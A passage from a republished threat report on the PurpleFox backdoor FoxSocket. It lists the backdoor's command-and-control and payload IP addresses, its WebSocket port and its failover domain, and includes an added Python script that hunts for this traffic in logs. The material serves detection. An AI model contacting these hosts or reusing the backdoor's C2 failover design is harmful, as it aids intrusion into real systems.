WebSocket C&amp;C servers<\/caption>\n<tbody readability=\"4.5\">\n<tr>\n<td><b>IP address<\/b><\/td>\n<td><b>Description<\/b><\/td>\n<td><b>ASN<\/b><\/td>\n<td><b>Notable activity<\/b><\/td>\n<\/tr>\n<tr readability=\"12\">\n<td>185.112.144.245<\/td>\n<td readability=\"9\">\n<p>Hosts PowerShell payloads (\/a\/[1-9]) and the .NET payload (\/a\/data)<\/p>\n<\/td>\n<td width=\"146\" valign=\"top\" rowspan=\"10\">\n<p>AS44925 (1984 ehf)<\/p>\n<\/td>\n<td>Iraq, Saudi Arabia, Turkey, UAE<\/td>\n<\/tr>\n<tr>\n<td>185.112.147.50<\/td>\n<td rowspan=\"7\">C&amp;C server<\/td>\n<td>Turkey, US, UAE<\/td>\n<\/tr>\n<tr>\n<td>185.112.144.101<\/td>\n<td>Turkey<\/td>\n<\/tr>\n<tr>\n<td>93.95.226.157<\/td>\n<td>US<\/td>\n<\/tr>\n<tr>\n<td>93.95.228.163<\/td>\n<td>US<\/td>\n<\/tr>\n<tr>\n<td>93.95.227.183<\/td>\n<td>&#8211;<\/td>\n<\/tr>\n<tr>\n<td>93.95.227.169<\/td>\n<td>UAE<\/td>\n<\/tr>\n<tr>\n<td>93.95.227.179<\/td>\n<td>&#8211;<\/td>\n<\/tr>\n<tr>\n<td>185.112.146.72<\/td>\n<td rowspan=\"2\">Potential C&amp;C server<\/td>\n<td>&#8211;<\/td>\n<\/tr>\n<tr>\n<td>185.112.146.83<\/td>\n<td>&#8211;<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>The backdoor picks a subdomain at random from its configuration data and tries to open a WebSocket connection to it on port 12345. If the connection fails, it resolves another subdomain and tries again.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox20.png\" alt=\"Random C&amp;C servers\"><figcaption>Figure 20. 
Random C&amp;C servers<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"43.748930971289\">\n<div readability=\"34.61453879047\">\n<p>The main domain <i>advb9fyxlf2v[.]com<\/i> used by these servers, registered on June 17, 2021, within days of the first observed variant, serves mainly to load-balance connections across the multiple active servers.<\/p>\n<p><span class=\"body-subhead-title\">Conclusion<\/span><\/p>\n<p>The rootkit capabilities of PurpleFox let it carry out its objectives more stealthily: they allow it to persist on affected systems and to deliver further payloads to them. We are still monitoring these new variants and their dropped payloads. We are also closely monitoring the new .NET WebSocket backdoor (called FoxSocket, which we detect as Backdoor.MSIL.PURPLEFOX.AA) to learn more about this threat actor\u2019s intentions and objectives.<\/p>\n<p><span class=\"body-subhead-title\">Trend Micro Solutions and Indicators of Compromise<\/span><\/p>\n<p>The capabilities of the <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response.html\">Trend Micro Vision One<\/a> platform made both the detection of this attack and our investigation into it possible. We took into account network and endpoint telemetry that would indicate potential exploitation attempts. The Trend Micro Vision One Workbench shows a holistic view of the activities observed in a user\u2019s environment by highlighting important attributes related to the attack.<\/p>\n<p><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response\/managed-xdr-mdr.html\">Trend Micro Managed XDR<\/a> offers expert threat monitoring, correlation, and analysis from experienced cybersecurity industry veterans, providing a 24\/7 service that gives organizations a single source of detection, analysis, and response. 
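<\/p>\n<p>The C&amp;C details given above (the Table 3 addresses, the fixed WebSocket port 12345, and the random-subdomain retry behaviour under advb9fyxlf2v[.]com shown in Figure 20) are enough to build a hunting query. The script below is an added example written for this page; it is not Trend Micro's code and is not derived from the FoxSocket sample. It runs over a constructed, simplified connection log whose tab-separated columns (timestamp, source IP, destination IP, destination port, protocol, Zeek-style connection state, and the server name the client resolved) are an assumption about what a sensor exports, and the 60-second retry window is likewise an assumption, not a value from the write-up.<\/p>

```python
"""Hunt for FoxSocket-style WebSocket C&C traffic in a connection log.

Added example for this write-up, not Trend Micro's code. It encodes only
what the text states: the Table 3 IP addresses, TCP port 12345, and the
load-balancing domain advb9fyxlf2v[.]com whose subdomains the backdoor
picks at random and retries on failure. The log layout and the retry
window are assumptions (see comments).
"""
from collections import defaultdict

# IP addresses listed in Table 3 (C&C and potential C&C servers).
FOXSOCKET_C2_IPS = frozenset({
    "185.112.144.245", "185.112.147.50", "185.112.144.101",
    "93.95.226.157", "93.95.228.163", "93.95.227.183", "93.95.227.169",
    "93.95.227.179", "185.112.146.72", "185.112.146.83",
})
C2_PORT = 12345                 # WebSocket port the backdoor connects to
C2_DOMAIN = "advb9fyxlf2v.com"  # written defanged as advb9fyxlf2v[.]com in the text

# Assumed column layout of the log being hunted (simplified, Zeek-like).
# conn_state uses Zeek's vocabulary: S0 = SYN sent, no answer; SF = normal session.
FIELDS = ("ts", "src_ip", "dst_ip", "dst_port", "proto", "conn_state", "server_name")

# Constructed sample, not captured traffic: one host fails twice, then succeeds.
# 203.0.113.10 / example.com and the corp.local line are benign filler.
SAMPLE_CONN_LOG = """\
# ts\tsrc_ip\tdst_ip\tdst_port\tproto\tconn_state\tserver_name
1633046400.10\t10.0.0.5\t93.95.227.183\t12345\ttcp\tS0\tq1.advb9fyxlf2v.com
1633046403.20\t10.0.0.5\t185.112.146.72\t12345\ttcp\tS0\tq7.advb9fyxlf2v.com
1633046406.40\t10.0.0.5\t185.112.147.50\t12345\ttcp\tSF\tq3.advb9fyxlf2v.com
1633046410.00\t10.0.0.9\t203.0.113.10\t443\ttcp\tSF\twww.example.com
1633046420.00\t10.0.0.9\t10.0.0.20\t12345\ttcp\tSF\tbuild-agent.corp.local
"""


def parse_conn_log(text):
    """Parse the tab-separated log into dicts, skipping comments and malformed lines."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) != len(FIELDS):
            continue  # do not crash a hunt on one malformed line
        rec = dict(zip(FIELDS, parts))
        rec["ts"] = float(rec["ts"])
        rec["dst_port"] = int(rec["dst_port"])
        records.append(rec)
    return records


def is_c2_domain(name):
    """True for the load-balancing domain itself or any subdomain of it."""
    name = name.lower().rstrip(".")
    return name == C2_DOMAIN or name.endswith("." + C2_DOMAIN)


def connection_indicators(rec):
    """Reasons a single record matches the write-up's indicators (empty if none)."""
    reasons = []
    if rec["dst_ip"] in FOXSOCKET_C2_IPS:
        reasons.append("destination IP listed in Table 3")
    if rec["dst_port"] == C2_PORT and is_c2_domain(rec["server_name"]):
        reasons.append("port 12345 to a subdomain of advb9fyxlf2v.com")
    return reasons


def failover_hosts(records, window_seconds=60, min_distinct=2):
    """Source hosts that try >= min_distinct destinations on port 12345 inside the window.

    This targets the behaviour described in the text: a failed connect makes
    the backdoor resolve another random subdomain and try again, so a host
    walking through several port-12345 destinations in quick succession is
    suspicious even before the destination IPs appear on an IOC list.
    The 60-second window is an assumption, not a value from the write-up.
    """
    by_src = defaultdict(list)
    for rec in records:
        if rec["proto"] == "tcp" and rec["dst_port"] == C2_PORT:
            by_src[rec["src_ip"]].append(rec)
    flagged = {}
    for src, recs in by_src.items():
        recs.sort(key=lambda r: r["ts"])
        for i, first in enumerate(recs):
            dsts = {r["dst_ip"] for r in recs[i:] if r["ts"] - first["ts"] <= window_seconds}
            if len(dsts) >= min_distinct:
                flagged[src] = sorted(dsts)
                break
    return flagged


def hunt(log_text):
    """Run both checks over a log and return the findings."""
    records = parse_conn_log(log_text)
    ioc_hits = []
    for rec in records:
        reasons = connection_indicators(rec)
        if reasons:
            ioc_hits.append((rec["src_ip"], rec["dst_ip"], reasons))
    return {"ioc_hits": ioc_hits, "failover_hosts": failover_hosts(records)}


if __name__ == "__main__":
    findings = hunt(SAMPLE_CONN_LOG)
    for src, dst, why in findings["ioc_hits"]:
        print(f"{src} -> {dst}: {'; '.join(why)}")
    for src, dsts in findings["failover_hosts"].items():
        print(f"{src} cycled through {len(dsts)} port-{C2_PORT} destinations: {dsts}")
```

<p>Run the file directly to print the findings for the constructed sample; on real data, map your sensor's columns onto FIELDS and pass the text to hunt(). Port 12345 on its own is a weak signal (the build-agent line in the sample is a benign use of the same port), which is why the behavioural check demands several distinct destinations in a short window and is reported separately from the plain IOC match.<\/p>\n<p>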
This service is enhanced by solutions that combine AI and Trend Micro\u2019s wealth of global threat intelligence.<\/p>\n<p>All IOCs related to this attack can be found in <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/iocs-purplefox.txt\">this separate file<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/j\/purplefox-adds-new-backdoor-that-uses-websockets.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks. 
Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":44111,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9511,9508,9513,9509],"class_list":["post-44110","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-endpoints","tag-trend-micro-research-malware","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>PurpleFox Adds New Backdoor That Uses WebSockets 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"PurpleFox Adds New Backdoor That Uses WebSockets 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2021-10-19T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox-main.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"13 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"PurpleFox Adds New Backdoor That Uses 
WebSockets\",\"datePublished\":\"2021-10-19T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/\"},\"wordCount\":2694,\"publisher\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Malware\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/\",\"url\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/\",\"name\":\"PurpleFox Adds New Backdoor That Uses WebSockets 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png\",\"datePublished\":\"2021-10-19T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage\",\"url\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png\",\"contentUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png\",\"width\":602,\"height\":534},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.threatshub.org\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"PurpleFox Adds New Backdoor That Uses WebSockets\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#website\",\"url\":\"https:\/\/www.threatshub.org\/blog\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 
SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\/\/www.threatshub.org\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH 
Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"PurpleFox Adds New Backdoor That Uses WebSockets 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/","og_locale":"en_US","og_type":"article","og_title":"PurpleFox Adds New Backdoor That Uses WebSockets 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2021-10-19T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox-main.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. 
reading time":"13 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"PurpleFox Adds New Backdoor That Uses WebSockets","datePublished":"2021-10-19T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/"},"wordCount":2694,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Threats","Trend Micro Research : Endpoints","Trend Micro Research : Malware","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/","url":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/","name":"PurpleFox Adds New Backdoor That Uses WebSockets 2026 | ThreatsHub Cybersecurity 
News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png","datePublished":"2021-10-19T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png","width":602,"height":534},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"PurpleFox Adds New Backdoor That Uses 
WebSockets"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a
8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/44110","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=44110"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/44110\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/44111"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=44110"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=44110"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=44110"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}